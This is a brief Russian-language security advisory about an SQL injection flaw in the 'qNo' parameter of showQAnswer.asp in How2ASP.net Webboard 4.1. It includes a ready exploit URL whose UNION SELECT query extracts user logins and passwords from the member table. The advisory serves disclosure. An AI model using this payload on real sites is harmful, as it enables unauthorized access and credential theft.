Программа: How2ASP.net Webboard 4.1

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения. Уязвимость существует из-за недостаточной
обработки входных данных в параметре «qNo» сценарием showQAnswer.asp. Удаленный
пользователь может с помощью специально сформированного запроса выполнить
произвольные SQL команды в базе данных приложения.

Эксплоит:

http://[target]/[path]/showQAnswer.asp?qNo=441%20
union%20select%201,2,Login,4,5,Password,7,8,9,10,11,12,13,14%20 from%20member
%20where%20Login%20not%20in%20(‘admin’,’test’,….)%00



Оставить мнение